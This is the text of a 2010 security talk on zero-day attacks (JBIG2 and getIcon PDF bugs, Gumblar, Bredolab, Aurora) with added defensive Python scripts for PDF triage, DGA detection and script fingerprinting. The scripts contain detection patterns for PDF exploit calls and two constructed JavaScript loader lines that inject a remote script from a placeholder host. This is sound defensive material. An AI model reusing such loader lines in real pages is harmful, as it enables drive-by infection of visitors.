Beyond Aurora's Veil: A Vulnerable Tale
Derek Manky, Cyber Security & Threat Research, FortiGuard Labs
October 26th, 2010: SecTor 2010, Toronto, CA
Conficker: April Doomsday... Meanwhile
JBIG2 Zero-Day (PDF/SWF)
- January 2009: malicious PDF samples in the wild
  - Drop Gh0st RAT trojan; exploit CVE-2009-0658
  - No-click variant through Windows shell extensions
- February 02, 2009: Adobe acknowledges via APSA09-01
- March 10, 2009: Adobe patches via APSB09-03
- Attacks occurred roughly 63 days before the patch
... A Vulnerable Tale: Gh0st RAT advertisement (photo)
Bredolab & Gumblar
Meanwhile: Gumblar & Bredolab botnets sync through PDF exploits
- March 18, 2009: Adobe issues patch APSB09-04, including CVE-2009-0927 (PDF exploit)
- March 23, 2009: Gumblar attack surfaces
  - Compromised websites serving exploits, freshly exploiting CVE-2009-0927
  - Drops Bredolab botnet (first appearance)
  - Downloads FTP-stealing module for Gumblar
  - Downloads FakeAV for profit
- Aggressively attacked 5 days after the POC was released
Bredolab & Gumblar (figure)
Bredolab & Gumblar: Then and Now
Gumblar & Bredolab botnets sync through PDF exploits
Bredolab:
- Oct 2009: new protocol (v2), custom encrypted HTTP
- Jan 2010: uses Pushdo botnet; new webmailing engine distributed (Webwail)[1], cracks CAPTCHAs in < 30 seconds
- Feb 2010: downloads ransomware; force-kills applications, demands > $50 USD
- Oct 2010: distributes Grum/Tedroo botnet
- Source code available: Bredolab is now used by various operators and attacks beyond its original incarnation
[1] FortiGuard Labs discovered Webwail in December 2009
Bredolab & Gumblar: Then and Now
Gumblar & Bredolab botnets sync through PDF exploits
Gumblar today[1]:
- 9,350 infected links
- 951 links hosting exploits
- 165 malware variants served
- Popular exploited vulnerabilities: CVE-2007-0701, CVE-2008-0655, CVE-2008-2992, CVE-2009-0927
[1] FortiGuard web scanning systems, Oct 19th, 2010
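Two of the PDF bugs in this deck (the JBIG2 zero-day, CVE-2009-0658, from the January 2009 slide, and the getIcon bug, CVE-2009-0927, that Gumblar used) can be triaged statically from the file itself. The script below is an added example, not FortiGuard's tooling or anything from the talk: it flags the /JBIG2Decode filter, JavaScript actions and the Collab.getIcon()/util.printf() calls (the CVE mapping in the comments is mine), and it shows why a plain grep is not enough: the sample PDF it builds in memory is constructed by me, not a real exploit, and hides its JavaScript behind a FlateDecode stream and #xx-escaped names.

```python
import re
import zlib

# Indicators for the PDF vulnerabilities the slides name. The CVE mapping is
# mine, not the slides': /JBIG2Decode -> CVE-2009-0658 (JBIG2 zero-day),
# Collab.getIcon() -> CVE-2009-0927 (Gumblar), util.printf() -> CVE-2008-2992.
INDICATORS = {
    "JBIG2Decode": re.compile(rb"/JBIG2Decode\b"),
    "JavaScript":  re.compile(rb"/(?:JavaScript|JS)\b"),
    "getIcon":     re.compile(rb"Collab\.getIcon\s*\("),
    "util.printf": re.compile(rb"util\.printf\s*\("),
}

NAME_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")          # e.g. /Java#53cript
STREAM = re.compile(rb"(?<!end)stream\r?\n(.*?)\r?\nendstream", re.S)


def unescape_names(data):
    """Decode #xx escapes in PDF names, an easy way to dodge a plain grep."""
    return NAME_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def inflate_streams(data):
    """Inflate every stream body that is zlib (FlateDecode) data.

    decompressobj() is used instead of zlib.decompress() so a stream whose
    trailing byte was eaten by the line-ending regex still yields its content.
    """
    bodies = []
    for m in STREAM.finditer(data):
        try:
            bodies.append(zlib.decompressobj().decompress(m.group(1)))
        except zlib.error:
            continue  # raw image data (e.g. JBIG2) or another filter; skip
    return bodies


def naive_scan(pdf_bytes):
    """What a plain pattern match over the raw file sees."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(pdf_bytes))


def triage(pdf_bytes):
    """Scan the raw file plus every inflated stream, after name unescaping."""
    views = [pdf_bytes] + inflate_streams(pdf_bytes)
    hits = set()
    for view in views:
        view = unescape_names(view)
        for name, rx in INDICATORS.items():
            if rx.search(view):
                hits.add(name)
    return sorted(hits)


def build_sample():
    """Constructed test file, not a real exploit: a JBIG2 image object and a
    Flate-compressed JavaScript action that calls Collab.getIcon(). The
    action names are #-escaped the way evasive samples write them."""
    js = b"var p = 'AAAA'; Collab.getIcon(p);"
    js_z = zlib.compress(js)
    objects = [
        b"%PDF-1.4\n",
        b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj\n",
        b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n",
        b"3 0 obj << /Type /XObject /Subtype /Image /Width 1 /Height 1 "
        b"/Filter /JBIG2Decode /Length 4 >>\nstream\n\x00\x00\x00\x00\nendstream\nendobj\n",
        b"4 0 obj << /Type /Action /S /Java#53cript /J#53 5 0 R >> endobj\n",
        b"5 0 obj << /Filter /FlateDecode /Length %d >>\nstream\n" % len(js_z)
        + js_z + b"\nendstream\nendobj\n",
        b"trailer << /Root 1 0 R >>\n%%EOF\n",
    ]
    return b"".join(objects)


if __name__ == "__main__":
    sample = build_sample()
    print("naive :", naive_scan(sample))   # only the uncompressed /JBIG2Decode
    print("triage:", triage(sample))       # also /JavaScript and getIcon
```

The naive pass sees only the JBIG2 filter name that sits uncompressed in an object dictionary; the JavaScript action and the getIcon call surface only after names are unescaped and the Flate stream is inflated. Real samples add further layers (object streams, other filters, JavaScript that decodes itself at run time), so this is a first-line triage, not a verdict.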
... A Vulnerable Tale: In the Threat Spotlight
Internet Explorer HTML Memory Corruption (Aurora)
- September 30, 2009: Microsoft receives vulnerability report (later CVE-2010-0249)
- December 15, 2009: attack discovered (as Google later acknowledged)
- January 04, 2010: C&C servers taken down
- January 12, 2010: attacks publicly acknowledged; dropped custom trojan
- January 14, 2010: public POC exploit code available
- January 21, 2010: Microsoft patches via MS10-002
- Zero-day 113 days before the patch, 7 days from public POC
... A Vulnerable Tale: Meanwhile
Internet Explorer Use-After-Free
- March 09, 2010: Microsoft acknowledges via advisory / CVE-2010-0806
  - Web drive-by attacks already in the wild
  - Drop Gh0st RAT trojan, similar to Aurora
- March 30, 2010: Microsoft patches via MS10-018
- Attacks occurred roughly 21 days before the patch
- FortiGuard detects the highest exploit rate before the patch (zero-day)
Internet Explorer Use-After-Free
Exploit Demonstration
The Next Chapter: What can we learn?
- Headlines are not everything
- Reactive defense against high-profile attacks == inefficient
- Threats often share similar attack techniques
  - Browsers, document formats, system services
  - Conficker / Neeris (RPC DCOM), Murofet (DGA)
  - Gh0st RAT (PDF JBIG2), Gumblar (PDF getIcon)
  - Aurora (Google et al.) & Gh0st RAT: IE use-after-free
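The slide lists domain generation (DGA) as a technique shared across bot families, and a DGA bot is visible in DNS telemetry without knowing its algorithm: it queries many random-looking names, most of which do not resolve. The script below is an added example, not anything from the talk or a reconstruction of Murofet's generator. It parses a constructed query log (my own format and my own made-up names), scores each registrable label with four cheap features (length, character entropy, vowel ratio, longest non-vowel run; thresholds are mine), and groups high-scoring queries per client so that a burst of NXDOMAIN answers stands out.

```python
import math
import re
from collections import defaultdict

# Constructed DNS query log, not real traffic: "<time> <client> <qname> <rcode>".
SAMPLE_LOG = """\
2010-10-19T10:00:01 10.0.0.5 www.google.com NOERROR
2010-10-19T10:00:02 10.0.0.5 mail.example.org NOERROR
2010-10-19T10:00:02 10.0.0.5 gogle.com NXDOMAIN
2010-10-19T10:00:03 10.0.0.5 stackoverflow.com NOERROR
2010-10-19T10:00:03 10.0.0.9 time.windows.com NOERROR
2010-10-19T10:00:03 10.0.0.9 qpxzvkwqhlrtmb.net NXDOMAIN
2010-10-19T10:00:03 10.0.0.9 xjwkdmvrpqtzls.com NXDOMAIN
2010-10-19T10:00:04 10.0.0.9 a7kq3zx9mtwb.biz NXDOMAIN
2010-10-19T10:00:04 10.0.0.9 rkjzqwpxlvtmbn.org NOERROR
"""

VOWELS = set("aeiou")


def parse_log(text):
    """Yield (client, qname, rcode) from the constructed log format."""
    for line in text.splitlines():
        if not line.strip():
            continue
        _ts, client, qname, rcode = line.split()
        yield client, qname.lower().rstrip("."), rcode


def registrable_label(qname):
    """Label left of the TLD. Assumes one-label TLDs; a public-suffix list
    would be needed to handle names like example.co.uk correctly."""
    parts = qname.split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def shannon_entropy(s):
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def longest_non_vowel_run(s):
    best = run = 0
    for ch in s:
        run = 0 if ch in VOWELS else run + 1
        best = max(best, run)
    return best


def dga_score(label):
    """Count of cheap features typical of algorithmically generated labels.
    Thresholds are my own, tuned only against the constructed sample."""
    n = len(label)
    vowel_ratio = sum(ch in VOWELS for ch in label) / n
    score = 0
    score += n >= 10
    score += shannon_entropy(label) >= 3.2
    score += vowel_ratio < 0.25
    score += longest_non_vowel_run(label) >= 4
    return score


def suspicious_clients(log_text, min_score=3, min_hits=3):
    """Group DGA-looking queries by client. A bot cycling through generated
    domains shows up as a burst of NXDOMAIN answers; the one that resolves
    is the live C&C, so the rcode is reported rather than filtered on."""
    hits = defaultdict(list)
    for client, qname, rcode in parse_log(log_text):
        if dga_score(registrable_label(qname)) >= min_score:
            hits[client].append((qname, rcode))
    return {c: q for c, q in hits.items() if len(q) >= min_hits}


if __name__ == "__main__":
    for client, queries in suspicious_clients(SAMPLE_LOG).items():
        print(client)
        for qname, rcode in queries:
            print("  ", qname, rcode, "score", dga_score(registrable_label(qname)))
```

On the sample, 10.0.0.5 is never flagged even though it produces an NXDOMAIN for a typo (gogle.com) and queries a long legitimate name (stackoverflow.com scores 2 of 4), while 10.0.0.9 is reported with three NXDOMAIN misses and one resolved hit. Per-client aggregation is what makes this usable: single names will always produce false positives, bursts rarely do.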
The Next Chapter: What can we learn?
- Zero-day attacks happen more often than you may think
- Attacks can continue for months undetected
- Patch response time can be 1-3 weeks once a vulnerability is detected and reported; otherwise 6-12 months
- Patched vulnerabilities are attacked quickly and frequently
  - Conficker: 30 days
  - Gumblar: 5 days
- Patch management: quick patching is essential, but it does not help against zero-day attacks
The Next Chapter: The new decade of threats
- Attacks can survive for years
- Attacks change extremely frequently
  - Server-side polymorphism: repack hosted malware, repack hosted scripts [Gumblar]
  - Crimeware and source code: copy & paste bots, new versions
  - Endless domains
- Creates tremendous volume
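Server-side repacking defeats file hashes by design: every visitor gets a slightly different script, so the sample count explodes while the behaviour stays the same. The example below is added here and is not Gumblar's code or anything from the talk. It takes two constructed variants of the same loader (renamed variables, different quoting, comments, whitespace and a re-encoded payload string; example.invalid is a placeholder host) and shows that their SHA-256 differs while a structural fingerprint, built from the token shape with identifiers and literals abstracted away, is identical.

```python
import hashlib
import re

# Two constructed variants of the same loader script, standing in for what a
# server-side repacker serves on successive requests: renamed variables,
# different quoting, comments and whitespace, and a re-encoded payload string.
# Not Gumblar's actual code; "example.invalid" is a placeholder host.
VARIANT_A = (
    'var a1="%3Cs%63ript src=%27http://example.invalid/x.js%27%3E%3C/script%3E";\n'
    "document.write(unescape(a1));\n"
)
VARIANT_B = (
    "/* build 2 */ var zq  = '%3Cscript src=%27http://example.invalid/y.js%27%3E%3C%2Fscript%3E' ;\n"
    "document.write( unescape( zq ) ) ;\n"
)
BENIGN = "function add(a, b) { return a + b; }\n"

TOKEN = re.compile(
    r"""(?P<comment>//[^\n]*|/\*.*?\*/)
       |(?P<string>"(?:\\.|[^"\\])*"|'(?:\\.|[^'\\])*')
       |(?P<ident>[A-Za-z_$][A-Za-z0-9_$]*)
       |(?P<number>\d+(?:\.\d+)?)
       |(?P<ws>\s+)
       |(?P<punct>.)""",
    re.S | re.X,
)

# Keywords and the DOM/JS names that carry meaning; everything else is a
# repacker-chosen identifier and is collapsed to IDENT.
KEEP = {
    "var", "function", "return", "if", "else", "for", "while", "new", "this",
    "eval", "unescape", "document", "write", "window", "location",
    "String", "fromCharCode", "setTimeout",
}


def normalize(script):
    """Collapse a script to its token shape: literals and throwaway
    identifiers are abstracted, comments and whitespace dropped."""
    out = []
    for m in TOKEN.finditer(script):
        kind = m.lastgroup
        if kind in ("comment", "ws"):
            continue
        if kind == "string":
            out.append("STR")
        elif kind == "number":
            out.append("NUM")
        elif kind == "ident":
            out.append(m.group() if m.group() in KEEP else "IDENT")
        else:
            out.append(m.group())
    return " ".join(out)


def content_hash(script):
    """Plain file hash: changes on every repack."""
    return hashlib.sha256(script.encode()).hexdigest()


def fingerprint(script):
    """Structural hash: stable across renaming, re-quoting and literal churn."""
    return hashlib.sha256(normalize(script).encode()).hexdigest()


if __name__ == "__main__":
    print("sha256 A == B ?", content_hash(VARIANT_A) == content_hash(VARIANT_B))
    print("shape  A == B ?", fingerprint(VARIANT_A) == fingerprint(VARIANT_B))
    print(normalize(VARIANT_A))
```

The shape "var IDENT = STR ; document . write ( unescape ( IDENT ) ) ;" is what both variants reduce to, and it is what a detection should key on rather than the bytes. The limitation is equally clear: a repacker that also restructures the code (splitting "unescape" into concatenated string pieces and calling it through eval, say) changes the token shape as well, and at that point static shape matching has to give way to running the script in an instrumented engine.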
FortiGuard Labs Security Research
- 87 zero-days discovered since 2008, mostly critical
- Oct 2010: 30+ outstanding in zero-day state
http://www.fortiguard.com/advisory/upcomingadvisory.html
Fighting Back: Strategic Defense
- Standard security rules apply; often ignored
- Layered security vs. growing attack surface; applicable to infection & post-infection
- Education and training (RSS): think before you link
- Use of JS, Flash (NoScript, PDF reader)
- Trust management (PGP, SSL)
- Alternative software considerations: OS, browsers, document readers, sandboxes
- Access-level lockdown (admin privileges)
Fighting Back: Layered Security vs. Growing Attack Surface
- Intrusion prevention: botnet C&C, zero-days & exploits
- Application control: malicious services, compromised Facebook applications
- Web filtering: botnet C&C, fast flux / malicious hosting, SEO
- Antispam: spambots & incoming campaigns
- Antivirus: trojans, bots, ransomware, etc.
- Vulnerability review: software used vs. alternatives